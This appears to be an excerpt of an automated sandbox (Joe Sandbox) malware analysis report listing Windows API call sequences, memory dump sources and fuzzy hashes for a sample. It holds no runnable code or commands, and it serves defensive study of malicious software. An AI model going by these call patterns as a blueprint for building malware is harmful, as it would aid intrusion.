                                                                                                    • Instruction Fuzzy Hash: 7C31C6705043419EEB35CB789849BF63BE8EB15740F9405E9E467D30A0FBB4AAC5CB21
                                                                                                    APIs
                                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00B1C21E,00000000), ref: 00B1CF38
                                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00B1CF6F
                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,00B1C21E,00000000), ref: 00B1CFB4
                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00B1C21E,00000000), ref: 00B1CFC8
                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00B1C21E,00000000), ref: 00B1CFF2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 3191363074-0
                                                                                                    • Opcode ID: 5e54ff447f3fc1747e92ddc550df8ac8513611f04ea23f4c2a983abc68fcb638
                                                                                                    • Instruction ID: 3a0266afb8d6b4a475814b10db4024c238a539b77040dc654d43021df03cb63b
                                                                                                    • Opcode Fuzzy Hash: 5e54ff447f3fc1747e92ddc550df8ac8513611f04ea23f4c2a983abc68fcb638
                                                                                                    • Instruction Fuzzy Hash: 1B313A71540205AFDB20DFA5C984AABBFF9EB14354B6044AEF516E3141DB30EE8A9B60
                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B01915
                                                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 00B019C1
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 00B019C9
                                                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 00B019DA
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00B019E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3382505437-0
                                                                                                    • Opcode ID: 847de4d0c25f22cd1b65ecb871533157b62ed02526744cecf1a8f9bf6b32201a
                                                                                                    • Instruction ID: 1fe31bbc1d37416820057684b7057e08fa8c3857661e5e71080e06d76c3129c3
                                                                                                    • Opcode Fuzzy Hash: 847de4d0c25f22cd1b65ecb871533157b62ed02526744cecf1a8f9bf6b32201a
                                                                                                    • Instruction Fuzzy Hash: 2231C071A00219EFCB04CFACCD99ADE3FB5EB45315F108669FA21A72D1C7709945DB90
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B35745
                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B3579D
                                                                                                    • _wcslen.LIBCMT ref: 00B357AF
                                                                                                    • _wcslen.LIBCMT ref: 00B357BA
                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B35816
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 763830540-0
                                                                                                    • Opcode ID: 4710f3a895467bb966cf1ddeb9389c26deb780db20c2c186fd2ee5ed3ef70ae9
                                                                                                    • Instruction ID: 66875b469e4780e3f7782e4d46ac7cd28a65b5b9b632d92b3cc860349ffdd4eb
                                                                                                    • Opcode Fuzzy Hash: 4710f3a895467bb966cf1ddeb9389c26deb780db20c2c186fd2ee5ed3ef70ae9
                                                                                                    • Instruction Fuzzy Hash: 55216575904618DADB309FA4DC85AED7BF8FF04724F208296E929EB2C4D7709985CF50
                                                                                                    APIs
                                                                                                    • IsWindow.USER32(00000000), ref: 00B20951
                                                                                                    • GetForegroundWindow.USER32 ref: 00B20968
                                                                                                    • GetDC.USER32(00000000), ref: 00B209A4
                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00B209B0
                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00B209E8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 4156661090-0
                                                                                                    • Opcode ID: 5b7ffe03b2465619dbfa738b03c369bab33f021ac9da27bb25ca67a49ea7e7d8
                                                                                                    • Instruction ID: fbefa2ab662b00351e0263bc8ff62bfbd95d5dc4f83b5c1dbd2a4ca8c5ed6c4a
                                                                                                    • Opcode Fuzzy Hash: 5b7ffe03b2465619dbfa738b03c369bab33f021ac9da27bb25ca67a49ea7e7d8
                                                                                                    • Instruction Fuzzy Hash: 0B219635600214AFD704EFA9D985A9EBBF5EF49700F148468F84AE7762CB30EC44CB50
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00ADCDC6
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ADCDE9
                                                                                                      • Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00ADCE0F
                                                                                                    • _free.LIBCMT ref: 00ADCE22
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ADCE31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 336800556-0
                                                                                                    • Opcode ID: df4ab27a62c8ef8a9c172a060d04f5162545e9051478e2e4a513a0260fe56c89
                                                                                                    • Instruction ID: 780b3add48663028d4156d4b469affb18eed32ff39e2b15d8dcd8afcdcb705c9
                                                                                                    • Opcode Fuzzy Hash: df4ab27a62c8ef8a9c172a060d04f5162545e9051478e2e4a513a0260fe56c89
                                                                                                    • Instruction Fuzzy Hash: B10175B26016167F672117BA6C48D7FBE6DEEC6BB1365012AF906D7301EE618D01D2B0
                                                                                                    APIs
                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AB9693
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00AB96A2
                                                                                                    • BeginPath.GDI32(?), ref: 00AB96B9
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00AB96E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 3225163088-0
                                                                                                    • Opcode ID: 4e94147e625b4881742c937bc6f1e5ab280f5de0b8f709f0d68e1d4f61b2d56a
                                                                                                    • Instruction ID: b2708fd143ff2b435a4286620f2ab2284bb2e88d75b7a971d7cf876d4e1a6b3b
                                                                                                    • Opcode Fuzzy Hash: 4e94147e625b4881742c937bc6f1e5ab280f5de0b8f709f0d68e1d4f61b2d56a
                                                                                                    • Instruction Fuzzy Hash: E3217F31802305EBDB119F6CDC29BEE7BB8BB10315F100616F619A71B2DB705893CBA0
                                                                                                    APIs
                                                                                                    • GetSysColor.USER32(00000008), ref: 00AB98CC
                                                                                                    • SetTextColor.GDI32(?,?), ref: 00AB98D6
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00AB98E9
                                                                                                    • GetStockObject.GDI32(00000005), ref: 00AB98F1
                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00AB9952
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$LongModeObjectStockTextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1860813098-0
                                                                                                    • Opcode ID: 4308b22a024f02154323d69ca5f3e05c640e3debfa5969d1b5655c41c23cab7f
                                                                                                    • Instruction ID: c0caf4516d51bef4544a0e8878768d0a789a328dcefab351536017d8a3383a18
                                                                                                    • Opcode Fuzzy Hash: 4308b22a024f02154323d69ca5f3e05c640e3debfa5969d1b5655c41c23cab7f
                                                                                                    • Instruction Fuzzy Hash: E111C832146250AFCB128FA5EC5AEEF3F78EB127117140559F642AB5B3CB254991CB50
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 2931989736-0
                                                                                                    • Opcode ID: f0fbc94c84a3734daa93cd540428509f4e84a93067815a17c7e37d5c86f415fd
                                                                                                    • Instruction ID: 87bae541a8ebc7637d4a5f31b36627881209ab9ec1b12b4a5a6d738730a52d2d
                                                                                                    • Opcode Fuzzy Hash: f0fbc94c84a3734daa93cd540428509f4e84a93067815a17c7e37d5c86f415fd
                                                                                                    • Instruction Fuzzy Hash: 0701B9B5781605BBD72855109F82FBB77DCEF21398F504064FD049EAC2F760ED1096A1
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,00ACF2DE,00AD3863,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6), ref: 00AD2DFD
                                                                                                    • _free.LIBCMT ref: 00AD2E32
                                                                                                    • _free.LIBCMT ref: 00AD2E59
                                                                                                    • SetLastError.KERNEL32(00000000,00AA1129), ref: 00AD2E66
                                                                                                    • SetLastError.KERNEL32(00000000,00AA1129), ref: 00AD2E6F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: 6ff828ac6400802e9f15e6283322cbbabd10ac7bb289932dd5e5a6d3e1c428a9
                                                                                                    • Instruction ID: 4a873a25afaffa9ac63104b05ff901ae621a273e1840b2b9573aeaca78779587
                                                                                                    • Opcode Fuzzy Hash: 6ff828ac6400802e9f15e6283322cbbabd10ac7bb289932dd5e5a6d3e1c428a9
                                                                                                    • Instruction Fuzzy Hash: 0C01D1366056006B872227756D45F2B3F69ABF13A2B34442BF837A33D2EEB48801C320
                                                                                                    APIs
                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?,?,00B0035E), ref: 00B0002B
                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00046
                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00054
                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?), ref: 00B00064
                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00070
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 3897988419-0
                                                                                                    • Opcode ID: c016179a1144cd78d640625da959e6f06c7534a1668aec7cc22abde97fc01f2d
                                                                                                    • Instruction ID: d3a6a4bc0615d47e2d44f304dfdd2e17540f9929222137d3eef90a1755d06f40
                                                                                                    • Opcode Fuzzy Hash: c016179a1144cd78d640625da959e6f06c7534a1668aec7cc22abde97fc01f2d
                                                                                                    • Instruction Fuzzy Hash: BE01A276610208BFDB115FA8DC48BAE7EEDEF44751F248164F905E3250EB71DE408BA0
                                                                                                    APIs
                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00B0E997
                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 00B0E9A5
                                                                                                    • Sleep.KERNEL32(00000000), ref: 00B0E9AD
                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00B0E9B7
                                                                                                    • Sleep.KERNEL32 ref: 00B0E9F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                    • String ID:
                                                                                                    • API String ID: 2833360925-0
                                                                                                    • Opcode ID: 639467a793eff54dcff6f2137b3f0bc9ab832519d36d9d190d6ea1b199c6c9af
                                                                                                    • Instruction ID: 4b11a12d4bd0cb563405a2a3524470e6305aa1515887d60a9929813a957728ab
                                                                                                    • Opcode Fuzzy Hash: 639467a793eff54dcff6f2137b3f0bc9ab832519d36d9d190d6ea1b199c6c9af
                                                                                                    • Instruction Fuzzy Hash: 4A011731C01A29DBCF00ABE5DD59AEDBFB8FB09701F100996E512B2291CF309654DBA1
                                                                                                    APIs
                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B01114
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01120
                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B0112F
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01136
                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B0114D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 842720411-0
                                                                                                    • Opcode ID: 87c662245a051cb078a1a5602809ce1cd84daf1fafa677aa46f8ffa075d592a6
                                                                                                    • Instruction ID: 1771060a834e1b86af07300fcfd135225a71c7b6266757d47b3247147b4ec232
                                                                                                    • Opcode Fuzzy Hash: 87c662245a051cb078a1a5602809ce1cd84daf1fafa677aa46f8ffa075d592a6
                                                                                                    • Instruction Fuzzy Hash: 45011979200615FFDB154FA9DC49A6A3FAEEF893A0B204459FA45E73A0DE31DC009B60
                                                                                                    APIs
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B00FCA
                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B00FD6
                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B00FE5
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B00FEC
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B01002
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 44706859-0
                                                                                                    • Opcode ID: 857c5f7680773c4d9e13ebe345748454a2469bc80579a48e5086d94e3ff1a02a
                                                                                                    • Instruction ID: 4ab8a7ab56a51bd17df94bdefefcd5c6a5594f806dbfb128eb91ade97e0ee0cf
                                                                                                    • Opcode Fuzzy Hash: 857c5f7680773c4d9e13ebe345748454a2469bc80579a48e5086d94e3ff1a02a
                                                                                                    • Instruction Fuzzy Hash: 37F04939200301BBDB264FA89C49F5A3FADEF89762F204854FA85E7291DE70DC508B60
                                                                                                    APIs
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B0102A
                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B01036
                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01045
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B0104C
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01062
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 44706859-0
                                                                                                    • Opcode ID: 08bb8aa7c873bb9854415df66526cfde67cde419e0fde532cf847aed6fc3e649
                                                                                                    • Instruction ID: 035601ad5c0324475d5dddc260bb1325bfbead68cabaf4d2844b1e1ed01c305c
                                                                                                    • Opcode Fuzzy Hash: 08bb8aa7c873bb9854415df66526cfde67cde419e0fde532cf847aed6fc3e649
                                                                                                    • Instruction Fuzzy Hash: 29F04939200301BFDB255FA8EC49F5A3FADEF89761F200814FA85E7290DE70D8508B60
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10324
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10331
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B1033E
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B1034B
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10358
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10365
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
